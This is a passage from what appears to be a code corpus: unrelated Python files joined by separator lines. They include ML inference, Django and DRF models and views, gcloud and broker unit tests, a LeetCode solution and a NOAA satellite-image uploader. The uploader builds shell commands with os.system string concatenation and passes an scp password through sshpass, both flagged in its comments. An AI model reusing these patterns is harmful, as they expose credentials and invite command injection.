    #    raise ValueError("Greedy sampling can only be used in one2many mode.")
    return opt
def main(opt):
    """Interactive keyphrase prediction: load the vocab and tokenized source
    file, build the one2many test loader, then write predictions under
    ``opt.pred_path``."""
    # load vocab
    word2idx, idx2word, vocab = load_vocab(opt)
    # load data
    # read tokenized text file and convert them to 2d list of words
    src_file = opt.src_file
    #trg_file = opt.trg_file
    #tokenized_train_pairs = read_src_and_trg_files(src_file, trg_file, is_train=False, remove_eos=opt.remove_title_eos) # 2d list of word
    if opt.title_guided:
        tokenized_src, tokenized_title = read_tokenized_src_file(src_file, remove_eos=opt.remove_title_eos, title_guided=True)
    else:
        tokenized_src = read_tokenized_src_file(src_file, remove_eos=opt.remove_title_eos, title_guided=False)
        tokenized_title = None
    # convert the 2d list of words to a list of dictionary, with keys 'src', 'src_oov', 'trg', 'trg_copy', 'src_str', 'trg_str', 'oov_dict', 'oov_list'
    # since we don't need the targets during testing, 'trg' and 'trg_copy' are some dummy variables
    #test_one2many = build_dataset(tokenized_train_pairs, word2idx, idx2word, opt, mode="one2many", include_original=True)
    test_one2many = build_interactive_predict_dataset(tokenized_src, word2idx, idx2word, opt, tokenized_title)
    # build the data loader
    test_one2many_dataset = KeyphraseDataset(test_one2many, word2idx=word2idx, idx2word=idx2word,
                                             type='one2many', delimiter_type=opt.delimiter_type, load_train=False, remove_src_eos=opt.remove_src_eos, title_guided=opt.title_guided)
    test_loader = DataLoader(dataset=test_one2many_dataset,
                             collate_fn=test_one2many_dataset.collate_fn_one2many,
                             num_workers=opt.batch_workers, batch_size=opt.batch_size, pin_memory=True,
                             shuffle=False)
    # init the pretrained model
    model = predict.init_pretrained_model(opt)
    # Print out predict path
    print("Prediction path: %s" % opt.pred_path)
    # predict the keyphrases of the src file and output it to opt.pred_path/predictions.txt
    predict.predict(test_loader, model, opt)
if __name__=='__main__':
    # load settings for training
    parser = argparse.ArgumentParser(
        description='interactive_predict.py',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    # Register the option groups shared with the training configuration.
    config.interactive_predict_opts(parser)
    config.model_opts(parser)
    config.vocab_opts(parser)
    opt = parser.parse_args()
    # Normalise/validate the options before running the prediction pipeline.
    opt = process_opt(opt)
    main(opt)
|
# Reads data for 4 people and reports: the group's average age, the name of
# the oldest man, and how many women are under 20.
med = 0      # running sum of all ages
h = ''       # name of the oldest man seen so far
m = 0        # count of women under 20
hi = 0       # age of the oldest man seen so far
for c in range(1, 5):
    n = input(f'Qual o nome da {c}ª pessoa? ')
    s = input(f'Qual o sexo da {c}ª pessoa [M/F]? ').strip().lower()
    i = int(input(f'Qual a idade da {c}ª pessoa? '))
    # Fixed: the old `s in 'f'` / `s in 'm'` substring tests also matched an
    # empty answer ('' is "in" every string), miscounting blank input.
    if s == 'f' and i < 20:
        m += 1
    if s == 'm' and i > hi:
        hi = i
        h = n
    med += i
print(f'A média de idade do grupo é de {med / 4:.1f} anos!')
print(f'O homem mais velho do grupo é o {h}')
print(f'Tem {m} mulher(es) com a idade menor de 20 anos.')
|
import traceback
import uuid
from aecErrorCheck import aecErrorCheck
from aecGeomCalc import aecGeomCalc
# NOTE(review): this class shadows the imported ``aecGeomCalc``; given that
# __type is 'aecGrid', the class was probably meant to be named aecGrid —
# verify before renaming (callers may rely on the current name). At
# class-body execution time the constructor calls below still resolve to
# the *imported* classes, because the new class name is not bound until the
# whole class statement completes.
class aecGeomCalc:
    # utility objects and data shared by all instances.
    __aecErrorCheck = aecErrorCheck() # An instance of aecErrorCheck.
    __aecGeomCalc = aecGeomCalc() # An instance of aecGeometryCalc
    __type = 'aecGrid' # Type identifier of object instances

    def __init__(self):
        """
        INTERNAL
        Constructor
        Creates the dictionary of all internal keys and values.
        Sets the ID to a new UUID.
        """
        # __properties is a dictionary of all internal variables
        self.__properties = \
        {
            # The following property values are preserved through a call to __initialize.
            'ID' : None, # A UUID
            'name' : "", # A custom string designation.
            # The following properties are reset by __invalidate()
            'area' : None, # Aggregate area of all cells
            'volume' : None, # Aggregate volume of all cells
            'cells' : [], # List of cells managed by this instance.
        } # end dictionary
        self.__properties['ID'] = uuid.uuid4()

    def getType(self):
        """
        string getType()
        Returns a string constant to identify the object type.
        Returns None on failure.
        """
        try:
            return self.__type
        except Exception:
            traceback.print_exc()
            return None
# @lc app=leetcode id=55 lang=python3
#
# [55] Jump Game
#
# https://leetcode.com/problems/jump-game/description/
#
# algorithms
# Medium (35.24%)
# Likes: 6069
# Dislikes: 418
# Total Accepted: 613.4K
# Total Submissions: 1.7M
# Testcase Example: '[2,3,1,1,4]'
#
# Given an array of non-negative integers nums, you are initially positioned at
# the first index of the array.
#
# Each element in the array represents your maximum jump length at that
# position.
#
# Determine if you are able to reach the last index.
#
#
# Example 1:
#
#
# Input: nums = [2,3,1,1,4]
# Output: true
# Explanation: Jump 1 step from index 0 to 1, then 3 steps to the last index.
#
#
# Example 2:
#
#
# Input: nums = [3,2,1,0,4]
# Output: false
# Explanation: You will always arrive at index 3 no matter what. Its maximum
# jump length is 0, which makes it impossible to reach the last index.
#
#
#
# Constraints:
#
#
# 1 <= nums.length <= 3 * 10^4
# 0 <= nums[i] <= 10^5
#
#
#
#
#
# @lc tags=array;greedy
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
# 跳跃游戏,看是否能跳到终点。
# 更简单的版本
#
# @lc idea=end
# @lc group=
# @lc rank=
# @lc code=start
class Solution:
    """Greedy solution: track the furthest index reachable so far."""

    def canJump(self, nums: List[int]) -> bool:
        """Return True iff the last index is reachable from index 0."""
        furthest = 0
        last = len(nums) - 1
        for pos, step in enumerate(nums):
            if pos > furthest:
                # We walked past everything reachable: stuck before the end.
                return False
            furthest = max(furthest, pos + step)
            if furthest >= last:
                return True
        return True
# @lc code=end
# @lc main=start
# Demo driver: run the two examples from the problem statement and show the
# computed answer next to the known one.
if __name__ == '__main__':
    print('Example 1:')
    print('Input : ')
    print('nums = [2,3,1,1,4]')
    print('Output :')
    print(str(Solution().canJump([2, 3, 1, 1, 4])))
    # Label fixed: this line announces the *expected* answer ("Exception"
    # was a typo for "Expected").
    print('Expected :')
    print('true')
    print()

    print('Example 2:')
    print('Input : ')
    print('nums = [3,2,1,0,4]')
    print('Output :')
    print(str(Solution().canJump([3, 2, 1, 0, 4])))
    print('Expected :')
    print('false')
    print()
# @lc main=end |
"""
This module contains functions needed for easy upload of files
to the web server.
"""
import os
from PIL import Image
from typing import List
from scipy.ndimage import rotate
from directdemod import constants
from directdemod.misc import save_metadata
from directdemod.georeferencer import Georeferencer
def preprocess_a(image_name: str, output_file: str) -> None:
    """Crop/rotate the first (A) half of the image and save it."""
    preprocess(image_name, output_file, lo=85, hi=995)
def preprocess_b(image_name: str, output_file: str) -> None:
    """Crop/rotate the second (B) half of the image and save it."""
    preprocess(image_name, output_file, lo=1125, hi=2035)
def preprocess(image_name: str, output_file: str, lo: int, hi: int) -> None:
    """Crop the image to the [lo, hi) column range, rotate it by 180
    degrees, and write the result to ``output_file``.

    Args:
        image_name (:obj:`string`): path to the input image
        output_file (:obj:`string`): path where the result image is saved
        lo (:obj:`int`): left cropping bound of the image
        hi (:obj:`int`): right cropping bound of the image
    """
    source = Image.open(image_name)
    _, height = source.size
    cropped = source.crop((lo, 0, hi, height))
    # scipy's rotate yields a numpy array, hence the fromarray round-trip.
    rotated = rotate(cropped, 180)
    Image.fromarray(rotated).save(output_file)
def process(path: str, sat_type: str) -> List[str]:
    """decodes recording in path (should be in .wav format), applies preprocessing, georeferencing both parts
    and sends both parts of the image to the server via ssh (scp command)

    Args:
        path (:obj:`str`): path to NOAA recording
        sat_type (:obj:`str`): type of the NOAA satellite (i. e. "NOAA 19")

    Returns:
        paths of the two georeferenced image halves (A and B)
    """
    file_name = os.path.basename(path)
    dir_path = os.path.dirname(path)
    # Run the demodulator as a subprocess; it writes <name>_f1.png next to
    # the recording. NOTE(review): os.system with string concatenation
    # breaks on paths containing spaces/quotes — subprocess.run with an
    # argument list would be safer.
    os.system("python3 " + constants.MODULE_PATH + "/main.py --tle=" + constants.TLE_NOAA + " -f " +
              str(constants.SAT_FREQ[sat_type]) + " -d noaa " + path)
    image_name = os.path.splitext(file_name)[0] + "_f1.png"
    tiff_name = os.path.splitext(file_name)[0] + ".tif"
    image_a, image_b = dir_path + "/" + "A_" + tiff_name, dir_path + "/" + "B_" + tiff_name
    # Split the combined decoded image into its A and B halves.
    preprocess_a(dir_path + "/" + image_name, image_a)
    preprocess_b(dir_path + "/" + image_name, image_b)
    referencer = Georeferencer(tle_file=constants.TLE_NOAA)
    # Write metadata for each half before georeferencing it in place.
    save_metadata(file_name=file_name,
                  image_name=image_a,
                  sat_type=sat_type,
                  tle_file=constants.TLE_NOAA)
    save_metadata(file_name=file_name,
                  image_name=image_b,
                  sat_type=sat_type,
                  tle_file=constants.TLE_NOAA)
    referencer.georef_tif(image_a, image_a)
    referencer.georef_tif(image_b, image_b)
    return [image_a, image_b]
def send(files: List[str]) -> None:
    """sends all images to web server

    NOTE(review): the scp password is passed on the command line via
    sshpass, which exposes it in the process list — prefer key-based auth.
    The command is also built by string concatenation, so any constant
    containing shell metacharacters would break or inject.
    """
    for image in files:
        os.system("sshpass -p '" + constants.PASS + "' scp " + image + " " + constants.USER +
                  "@" + constants.IP + ":" + constants.DIR)
def remove(files: List[str]) -> None:
    """Delete every existing regular file in ``files``; skip anything else."""
    for path in filter(os.path.isfile, files):
        os.remove(path)
def process_files(files: List[str], sat_types: List[str]) -> None:
    """Process each recording with its satellite type, upload the results,
    then delete the local copies."""
    images = []
    for idx, recording in enumerate(files):
        images.extend(process(recording, sat_types[idx]))
    send(images)
    remove(images)
|
# stdlib
import pathlib
from pprint import pprint
# 3rd party
import astropy.units as u
# this package
import py2latex
from py2latex.glossaries import glossary_from_file
from py2latex.markdown_parser import load_markdown
from py2latex.sectioning import make_chapter
from py2latex.siunit import SI, si
# Collect document fragments (chapters, unit demos, glossary note) in order;
# py2latex.make_document stitches them into demo.tex at the end.
chapters_list = []

for title, filename in [
    (f"Chapter 0", "Chapter0.tex"),
    (f"Chapter 1", "Chapter1.tex"),
    (f"Chapter 2", "Chapter2.tex"),
]:
    body = pathlib.Path(filename).read_text()
    chapters_list.append(make_chapter(title, body=body))

# Markdown sources are converted to LaTeX before being wrapped as chapters.
text_md = load_markdown("text.md")
chapters_list.append(make_chapter(title=f"Markdown Chapter", body=text_md))
chapters_list.append(make_chapter(title=f"Introduction", body=load_markdown("introduction.md")))

# siunitx demos: render composite astropy units and one quantity.
kgms = u.kg * u.m / u.A / u.s
chapters_list.append(si(kgms))
l3vt3 = u.lux**3 * u.V / u.T**3
chapters_list.append(si(l3vt3))
chapters_list.append(SI(3 * l3vt3))

glossary = glossary_from_file(pathlib.Path("glossary.yaml"))
pprint(glossary)

chapters_list.append(r"\bigskip\huge{\texttt{py}$2$\LaTeX}")

py2latex.make_document("demo.tex", chapters_list, glossary=glossary)
|
#!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the del_static_route command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
from machinetest import MachineTestMixin
class TestDelStaticRoute(MachineTestMixin, TestBrokerCommand):
    """Exercises ``del static route`` and verifies the routes disappear
    from network, host and plenary output afterwards."""

    def testdelroute1(self):
        gw = self.net["routing1"].usable[-1]
        command = ["del", "static", "route", "--gateway", gw,
                   "--ip", "192.168.250.0", "--prefixlen", "23"]
        self.statustest(command)

    def testdelroute1again(self):
        # Deleting the same route twice must fail with a not-found error.
        gw = self.net["routing1"].usable[-1]
        command = ["del", "static", "route", "--gateway", gw,
                   "--ip", "192.168.250.0", "--prefixlen", "23"]
        out = self.notfoundtest(command)
        self.matchoutput(out,
                         "Static Route to 192.168.250.0/23 using gateway "
                         "%s not found." % gw,
                         command)

    def testdelroute1_personality(self):
        # A personality-scoped route must be deleted naming the personality.
        gw = self.net["routing1"].usable[-1]
        command = ["del", "static", "route", "--gateway", gw,
                   "--ip", "192.168.248.0", "--prefixlen", "24",
                   "--personality", "inventory"]
        self.statustest(command)

    def testdelroute2(self):
        gw = self.net["routing2"].usable[-1]
        command = ["del", "static", "route", "--gateway", gw,
                   "--ip", "192.168.252.0", "--prefixlen", "23"]
        self.noouttest(command)

    def testdelroute2_guess(self):
        # Use the network's own gateway address instead of a usable host IP.
        gw = self.net["routing2"].gateway
        command = ["del", "static", "route", "--gateway", gw,
                   "--ip", "192.168.254.0", "--prefixlen", "24"]
        self.noouttest(command)

    def testdelroute3(self):
        net = self.net["routing3"]
        gw = net[3]
        command = ["del", "static", "route", "--gateway", gw,
                   "--ip", "192.168.254.0", "--prefixlen", "24"]
        self.noouttest(command)

    def testdelroute4(self):
        gw = self.net["unknown0"].gateway
        command = ["del", "static", "route", "--gateway", gw,
                   "--ip", "250.250.0.0", "--prefixlen", "16"]
        self.statustest(command)

    def testverifynetwork(self):
        # After deletion the network must no longer list any static route.
        command = ["show", "network", "--ip", self.net["routing1"].ip]
        out = self.commandtest(command)
        self.matchclean(out, "Static Route", command)

    def testverifyunittest02(self):
        command = ["show", "host", "--hostname", "unittest02.one-nyp.ms.com"]
        out = self.commandtest(command)
        self.matchclean(out, "Static Route", command)

    def testverifyunittest26(self):
        # The generated plenary data must keep only the plain interface keys
        # (no route entries) once the static routes are gone.
        net = self.net["routing1"]
        ip = net.usable[0]
        command = ["cat", "--hostname", "unittest26.aqd-unittest.ms.com", "--data"]
        out = self.commandtest(command)
        self.searchoutput(out,
                          r'"system/network/interfaces/eth1" = nlist\(\s*'
                          r'"bootproto", "static",\s*'
                          r'"broadcast", "%s",\s*'
                          r'"fqdn", "unittest26-e1.aqd-unittest.ms.com",\s*'
                          r'"gateway", "%s",\s*'
                          r'"ip", "%s",\s*'
                          r'"netmask", "%s",\s*'
                          r'"network_environment", "internal",\s*'
                          r'"network_type", "unknown"\s*\)' %
                          (net.broadcast_address, net.gateway, ip, net.netmask),
                          command)

    def testdelunittest27(self):
        # Clean up the host that was created for the static-route tests.
        eth0_ip = self.net["unknown0"].usable[37]
        eth1_ip = self.net["routing1"].usable[1]
        self.delete_host("unittest27.aqd-unittest.ms.com", eth0_ip, "ut3c5n9",
                         eth1_ip=eth1_ip)
if __name__ == '__main__':
    # Run just this test case with verbose per-test output.
    loader = unittest.TestLoader()
    runner = unittest.TextTestRunner(verbosity=2)
    runner.run(loader.loadTestsFromTestCase(TestDelStaticRoute))
|
import mock
from .context import aiociscospark
class TestSparkAppClient:
    """Checks APIClient wiring: HTTP client construction and service attrs."""

    def test_initialization(self, event_loop, credentials):
        # Patch the class attribute so the constructor call can be asserted
        # while still producing a real HTTPClient instance.
        with mock.patch.object(aiociscospark.APIClient, 'http_client_class',
                               side_effect=aiociscospark.http_client.HTTPClient) as http_client_class_mock:  # noqa
            client = aiociscospark.APIClient(credentials, loop=event_loop)
            assert isinstance(client.http_client, aiociscospark.http_client.HTTPClient)
            http_client_class_mock.assert_called_once_with(credentials, loop=event_loop)
            # Every REST resource must be exposed as an ApiService attribute.
            for svc in ['contents', 'licenses', 'messages', 'organizations', 'people', 'roles',
                        'room_memberships', 'rooms', 'team_memberships', 'teams', 'webhooks']:
                assert isinstance(getattr(client, svc), aiociscospark.services.ApiService)
# Module-level pytest test; ``event_loop`` and ``credentials`` are fixtures
# injected by name. NOTE(review): if this was meant to live inside
# TestSparkAppClient it is missing ``self`` — verify the intended scope.
def test_get_client(event_loop, credentials):
    client = aiociscospark.get_client(credentials, loop=event_loop)
    assert isinstance(client, aiociscospark.APIClient)
|
from django.db import models
from django.utils import timezone
from django.urls import reverse
class Post(models.Model):
    """A blog post written by a site user."""

    author = models.ForeignKey('auth.User', on_delete=models.CASCADE)
    title = models.CharField(max_length=250)
    text = models.TextField()
    # Pass the callable itself, NOT timezone.now(): calling it here would
    # freeze the default to the moment the module (or migration) was loaded,
    # stamping every post with the same date.
    create_date = models.DateTimeField(default=timezone.now)
    published_date = models.DateTimeField(blank=True, null=True)

    def publish(self):
        """Stamp the post with the current time and persist it."""
        self.published_date = timezone.now()
        self.save()

    def approved_comments(self):
        """Return only the approved comments attached to this post."""
        return self.comments.filter(approved=True)

    def __str__(self):
        return self.title

    def get_absolute_url(self):
        return reverse('blog:post_detail', kwargs={'pk': self.pk})
class Comment(models.Model):
    """A reader comment on a Post; hidden until approved."""

    # NOTE(review): field named "Post" (capitalised) breaks the lowercase
    # convention, but renaming would require a migration — left as-is.
    Post = models.ForeignKey('blog.Post', related_name='comments', on_delete=models.CASCADE)
    author = models.CharField(max_length=30)
    text = models.TextField()
    # Callable default (not timezone.now()): evaluated per save instead of
    # once at import/migration time.
    date = models.DateTimeField(default=timezone.now)
    approved = models.BooleanField(default=False)

    def __str__(self):
        return self.text

    def approve(self):
        """Mark the comment approved and persist the change."""
        self.approved = True
        self.save()
        print('comment approved!')

    def get_absolute_url(self):
        return reverse('blog:post_list')
|
from rest_framework.generics import get_object_or_404
from rest_framework.mixins import ListModelMixin
from rest_framework.reverse import reverse
from rest_framework.viewsets import GenericViewSet
from drf_hal.views import HalRetrieveModelMixin
from registronavale import relations
from . import models
from . import serializers
class SearchShips(ListModelMixin, GenericViewSet):
    """List ships whose name contains the ``q`` query parameter."""
    serializer_class = serializers.ShipSerializer

    def get_queryset(self):
        # NOTE(review): a missing ``q`` raises KeyError (HTTP 500); consider
        # query_params.get('q', '') if an empty search should be tolerated.
        query = self.request.query_params['q']
        return models.Ship.objects.filter(name__icontains=query)

    def retrieve(self, request, *args, **kwargs):
        # Detail requests are answered with the filtered list.
        return self.list(request, *args, **kwargs)
class Company(HalRetrieveModelMixin, GenericViewSet):
    """Retrieve a single company as a HAL resource."""
    queryset = models.Company.objects.all()
    serializer_class = serializers.CompanySerializer
class CompanyShips(ListModelMixin, GenericViewSet):
    """List every ship belonging to one company (looked up by pk)."""
    serializer_class = serializers.ShipSerializer

    def get_queryset(self):
        # prefetch_related avoids a second query when reading company.ships.
        queryset = models.Company.objects.prefetch_related('ships')
        company = get_object_or_404(queryset, pk=self.kwargs['pk'])
        return company.ships.all()

    def retrieve(self, request, *args, **kwargs):
        # BUG FIX: DRF dispatches detail requests to retrieve(); the original
        # defined retrieve_model(), which nothing ever called (compare the
        # SearchShips viewset in this module).
        return self.list(request, *args, **kwargs)
class Ship(HalRetrieveModelMixin, GenericViewSet):
    # HAL-formatted detail endpoint for a single ship, addressed by its
    # IMO number rather than the database pk.
    queryset = models.Ship.objects.all()
    lookup_field = 'imo'
    serializer_class = serializers.ShipSerializer
|
import click
from ..api import GithubException
from .utils import repo_manager
@click.command()
@click.option(
    "--sandbox",
    is_flag=True,
    help="Validate only on sandbox/deploy branch",
    default=False,
)
@click.option(
    "--yes-no",
    is_flag=True,
    help="Return yes for version is good, no for version is not good",
    default=False,
)
@click.pass_context
def validate(ctx, sandbox, yes_no):
    """Check if version of repository is semantic
    """
    manager = repo_manager(ctx)
    # Guard clause: when restricted to sandbox, stay silent unless a
    # sandbox release is actually possible.
    if sandbox and not manager.can_release("sandbox"):
        return
    try:
        version = manager.validate_version()
    except GithubException:
        if not yes_no:
            raise
        click.echo("no")
    else:
        click.echo("yes" if yes_no else version)
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""`gcloud iot devices update` command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.cloudiot import devices
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.iot import flags
from googlecloudsdk.command_lib.iot import resource_args
from googlecloudsdk.command_lib.iot import util
from googlecloudsdk.core import log
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Update(base.UpdateCommand):
  """Update an existing device."""
  detailed_help = {
      'DESCRIPTION':
          '{description}',
      'EXAMPLES':
          """\
          The following command updates the device 'my-device' in device registry 'my-registry' in region 'us-central1'. It blocks the device and sets metadata values.
            $ {command} my-device --region=us-central1 --registry=my-registry --blocked --metadata=key1=value1,key2=value2
          """,
  }
  @staticmethod
  def Args(parser):
    # Positional device resource plus the mutable device properties.
    resource_args.AddDeviceResourceArg(parser, 'to update')
    flags.AddDeviceFlagsToParser(parser, default_for_blocked_flags=False)
    flags.AddLogLevelFlagToParser(parser)
  def Run(self, args):
    """Patch the device with the blocked/metadata/log-level values from args."""
    client = devices.DevicesClient()
    device_ref = args.CONCEPTS.device.Parse()
    # Metadata may come inline (--metadata) or from files (--metadata-from-file).
    metadata = util.ParseMetadata(args.metadata,
                                  args.metadata_from_file,
                                  client.messages)
    log_level = util.ParseLogLevel(
        args.log_level, client.messages.Device.LogLevelValueValuesEnum)
    device = client.Patch(device_ref,
                          blocked=args.blocked,
                          metadata=metadata,
                          log_level=log_level)
    # Emit the standard "Updated device [...]" log line before returning.
    log.UpdatedResource(device_ref.Name(), 'device')
    return device
@base.ReleaseTracks(base.ReleaseTrack.ALPHA,
                    base.ReleaseTrack.BETA)
class UpdateAlpha(base.UpdateCommand):
  """Update an existing device."""
  detailed_help = {
      'DESCRIPTION':
          '{description}',
      'EXAMPLES':
          """\
          The following command updates the device 'my-device' in device registry 'my-registry' in region 'us-central1'. It blocks the device and sets metadata values.
            $ {command} my-device --region=us-central1 --registry=my-registry --blocked --metadata=key1=value1,key2=value2
          """,
  }
  @staticmethod
  def Args(parser):
    resource_args.AddDeviceResourceArg(parser, 'to update')
    flags.AddDeviceFlagsToParser(parser, default_for_blocked_flags=False)
    # Alpha/Beta only: gateway authentication method choice.
    flags.GATEWAY_AUTH_METHOD_ENUM_MAPPER.choice_arg.AddToParser(parser)
    flags.AddLogLevelFlagToParser(parser)
  def Run(self, args):
    """Patch the device; adds --auth-method handling on top of the GA track."""
    client = devices.DevicesClient()
    device_ref = args.CONCEPTS.device.Parse()
    metadata = util.ParseMetadata(args.metadata,
                                  args.metadata_from_file,
                                  client.messages)
    # Map the CLI choice string onto the API enum value.
    auth_method = flags.GATEWAY_AUTH_METHOD_ENUM_MAPPER.GetEnumForChoice(
        args.auth_method)
    log_level = util.ParseLogLevel(
        args.log_level, client.messages.Device.LogLevelValueValuesEnum)
    device = client.Patch(device_ref,
                          blocked=args.blocked,
                          metadata=metadata,
                          auth_method=auth_method,
                          log_level=log_level)
    log.UpdatedResource(device_ref.Name(), 'device')
    return device
|
from datetime import datetime
from django.test import TestCase
from django.test.client import Client
from corehq.apps.receiverwrapper.models import RepeatRecord, AppStructureRepeater
from corehq.apps.app_manager.models import Application
class TestAppStructureRepeater(TestCase):
    # Integration test: saving an Application should enqueue a RepeatRecord
    # once an AppStructureRepeater is registered for the domain.
    def setUp(self):
        self.client = Client()
        self.domain = 'bedazzled'
        # Deliberately unreachable URL: records only need to be queued here,
        # never actually forwarded.
        self.forwarding_url = 'http://not-a-real-url-at-all'
    def test_repeat_record_created(self):
        '''
        Tests that whenever an application with a repeater is saved that a repeat record is created.
        '''
        application = Application(domain=self.domain)
        application.save()
        # Baseline: no repeater registered yet, so saving created no records.
        repeat_records = RepeatRecord.all(domain=self.domain, due_before=datetime.utcnow())
        self.assertEqual(len(repeat_records), 0)
        app_structure_repeater = AppStructureRepeater(domain=self.domain, url=self.forwarding_url)
        app_structure_repeater.save()
        # Saving again now that the repeater exists should create one record.
        application.save()
        repeat_records = RepeatRecord.all(domain=self.domain, due_before=datetime.utcnow())
        self.assertEqual(len(repeat_records), 1)
        for repeat_record in repeat_records:
            self.assertEqual(repeat_record.url, self.forwarding_url)
            self.assertEqual(repeat_record.get_payload(), application.get_id)
            repeat_record.delete()
        # Clean up the documents this test created.
        application.delete()
        app_structure_repeater.delete()
|
"""
Tests for decomposing documents into basis vectors
"""
import unittest
from os.path import join
from crossmap.crossmap import Crossmap
from crossmap.tools import read_yaml_documents
from .tools import remove_crossmap_cache
# Locations of the test configuration and its dataset.
data_dir = join("tests", "testdata")
config_file = join(data_dir, "config-similars.yaml")
dataset_file = join(data_dir, "dataset-similars.yaml")

# Parse the dataset once at import time so every test class can reuse it.
similars_docs = read_yaml_documents(dataset_file)
class CrossmapDecomposeTests(unittest.TestCase):
    """Decomposing objects onto targets - single documents"""
    @classmethod
    def setUpClass(cls):
        # Building the crossmap indexes is expensive; do it once per class.
        cls.crossmap = Crossmap(config_file)
        cls.crossmap.build()
    @classmethod
    def tearDownClass(cls):
        remove_crossmap_cache(data_dir, "crossmap_similars")
    def test_decompose_BD(self):
        """object matching against B and D"""
        doc = dict(data="Bob Bravo Delta David. Bob Bravo Bernard")
        # standard nearest neighbors should return two Bs
        prediction = self.crossmap.search(doc, "targets", n=2)
        self.assertTrue("B1" in prediction["targets"])
        self.assertTrue("B2" in prediction["targets"])
        self.assertEqual(len(prediction["targets"]), 2)
        # decomposition should give one B and one D
        decomposition = self.crossmap.decompose(doc, "targets", n=2)
        BD = set(["B1", "B2", "D1", "D2"])
        self.assertTrue(decomposition["targets"][0] in BD)
        self.assertTrue(decomposition["targets"][1] in BD)
    def test_decompose_CC(self):
        """object matching against Cs"""
        doc = dict(data="Charlie Christine Camilla. Bob Charlie Charlie")
        # standard nearest neighbors should return two Cs
        prediction = self.crossmap.search(doc, "targets", n=2)
        self.assertTrue("C1" in prediction["targets"])
        self.assertTrue("C2" in prediction["targets"])
        self.assertEqual(len(prediction["targets"]), 2)
        # decomposition should also give Cs
        decomposition = self.crossmap.decompose(doc, "targets", n=2)
        self.assertTrue(decomposition["targets"][0] in set(["C1", "C2"]))
        self.assertTrue(decomposition["targets"][1] in set(["C1", "C2"]))
    def test_decompose_empty_doc(self):
        """decomposing an empty document should not raise exceptions"""
        doc = dict(data="", aux_pos="")
        decomposition = self.crossmap.decompose(doc, "targets", n=3)
        # an empty input decomposes into no targets and no coefficients
        self.assertEqual(decomposition["targets"], [])
        self.assertEqual(decomposition["coefficients"], [])
    def test_decompose_factors(self):
        """decomposition using a factor suggestion"""
        # this document is most similar to B2 and C1
        doc = dict(data="Bob Bravo Benjamin Charlie Clare. Bob Bravo.")
        # standard decomposition
        plain = self.crossmap.decompose(doc, "targets", n=2)
        self.assertListEqual(list(plain["targets"]), ["B2", "C1"])
        # decomposition can take a factor suggestion
        result = self.crossmap.decompose(doc, "targets", n=2, factors=["B1"])
        # the suggested factor B1 replaces the automatically-picked B2
        self.assertListEqual(list(result["targets"]), ["B1", "C1"])
class CrossmapDecomposeBatchTests(unittest.TestCase):
    """Decomposing objects onto targets - in batch"""
    @classmethod
    def setUpClass(cls):
        cls.crossmap = Crossmap(config_file)
        cls.crossmap.build()
        # the module-level parse of the dataset; used to verify self-matches
        cls.targets = similars_docs
    @classmethod
    def tearDownClass(cls):
        remove_crossmap_cache(data_dir, "crossmap_similars")
    def test_decompose_documents(self):
        """exact document matches should produce short decomposition vectors"""
        targets_file = self.crossmap.settings.data.collections["targets"]
        result = self.crossmap.decompose_file(targets_file, "targets", 2)
        for i in range(len(result)):
            iresult = result[i]
            # all targets should match to themselves only, with coeff 1.0
            self.assertTrue(iresult["targets"][0] in self.targets)
            self.assertEqual(len(iresult["targets"]), 1)
            self.assertEqual(len(iresult["coefficients"]), 1)
            self.assertAlmostEqual(iresult["coefficients"][0], 1.0)
|
# Note that this requires yt 4!
import yt
import contextlib
from collections import defaultdict
# Load the sample dataset; touching ds.index forces index construction so
# the chunking machinery exists before we start iterating.
ds = yt.load_sample("snapshot_033")
print(ds.index)
reg = ds.r[0.25:0.5, 0.5:0.75, 0.2:0.25]
# Iterating chunks triggers _identify_base_chunk under the hood.
for chunk in reg.chunks([], "io"):
    print(chunk)
# So what has just happened is that `_identify_base_chunk` was called, and that
# creates a list of base chunk objects. We can see this with a function
# decorator:
def print_input_output(func):
    """Decorator that logs a function's arguments and its return value."""
    def wrapper(*args, **kwargs):
        print(f"Entering {func.__name__}")
        for position, value in enumerate(args):
            print(f"  arg {position}: {value}")
        for key, value in sorted(kwargs.items()):
            print(f"  {key} = {value}")
        result = func(*args, **kwargs)
        print(f"Leaving {func.__name__}")
        print(f"  return value: {result}")
        return result
    return wrapper
# Monkeypatch the index method so every call logs its inputs and its output;
# accessing a field below then shows _identify_base_chunk returning None
# (it mutates the YTRegion in place).
ds.index._identify_base_chunk = print_input_output(ds.index._identify_base_chunk)
reg = ds.r[0.25:0.5, 0.5:0.75, 0.2:0.25]
reg["density"]
# When we do this, note that what is supplied is the YTRegion object, and what
# is returned is ... None! That's because the index object modifies the
# YTRegion object in place.
def print_chunk_info(dobj, indent = 0):
    """Print the current chunk state of a yt data object, indented by `indent` spaces."""
    space = indent * " "
    # f"{expr=}" (py3.8+) prints both the expression text and its value.
    print(f"{space}{dobj._current_chunk=}")
    print(f"{space}{dobj._current_chunk.chunk_type=}")
    print(f"{space}{dobj._current_chunk.data_size=}")
    print(f"{space}{dobj._current_chunk.dobj=}")
